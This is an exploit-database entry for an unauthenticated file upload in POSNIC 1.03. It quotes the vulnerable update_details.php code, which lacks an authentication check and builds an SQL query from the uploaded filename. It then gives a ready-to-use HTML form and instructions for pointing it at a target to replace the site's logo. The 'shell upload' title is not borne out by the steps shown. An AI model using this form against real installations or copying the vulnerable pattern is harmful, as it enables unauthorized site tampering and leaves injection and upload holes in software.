POSNIC 1.03 Shell Upload Exploit

2017-02-08T00:00:00
ID 1337DAY-ID-26929
Type zdt
Reporter Rony Das
Modified 2017-02-08T00:00:00

Description

POSNIC version 1.03 suffers from a remote shell upload vulnerability.

                                        
                                            <!--
# Exploit Title: POSNIC Unauthenticated File Upload
# Date: 04-02-2017
# Exploit Author: Rony Das
# Vendor Homepage: http://www.posnic.com
# Software Link: https://github.com/Posnic/POSNIC-1.03
# Version: 1.03
# Tested on: Ubuntu 14.04
-->

<!-- 
VULNERABLE CODE: /update_details.php

<if (isset($_POST['submit']) and $_POST['submit'] === 'Submit') {

    $allowedExts = array("gif", "jpeg", "jpg", "png");
    $temp = explode(".", $_FILES["file"]["name"]);
    $extension = end($temp);
    if ((($_FILES["file"]["type"] == "image/gif")
            || ($_FILES["file"]["type"] == "image/png"))
        && ($_FILES["file"]["size"] < 30000)
        && in_array($extension, $allowedExts)
    ) {
        if ($_FILES["file"]["error"] > 0) {
            echo "Return Code: " . $_FILES["file"]["error"] . "<br>";
        } else {
            $upload = $_FILES["file"]["name"];
            $type = $_FILES["file"]["type"];


            if (file_exists("upload/" . $_FILES["file"]["name"])) {

                unlink($upload);
            }


            $name = $_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"],
                "upload/" . $name);
            //echo "Stored in: " . "upload/" . $_FILES["file"]["name"];
            $upload;
            $_SESSION['logo'] = $upload;

            # Note that filters and validators are separate rule sets and method calls. There is a good reason for this.

            $db->query("UPDATE store_details  SET log ='" . $upload . "',type='" . $type . "'");

-->



<!-- Exploit -->
<!-- 
Put your target to the action="http://yourtarget.com/posnicdirectory/update_details.php" 
Then choose a image file and rename it to "posnic.png" this replaces the LOGO , 
not overwrites because they delete's the file if already exists and replaces with the 
new uploaded file.

//if (file_exists("upload/" . $_FILES["file"]["name"])) {

//                unlink($upload);
//            }
-->

<center>
<form action="http://localhost/posnic/update_details.php" method="POST" enctype="multipart/form-data">
            <p>Upload Logo</p>
            <input type="file" name="file" id="file"><br><br><br>
            <input type="submit" name="submit" value="Submit">
</form>

#  0day.today [2018-03-14]  #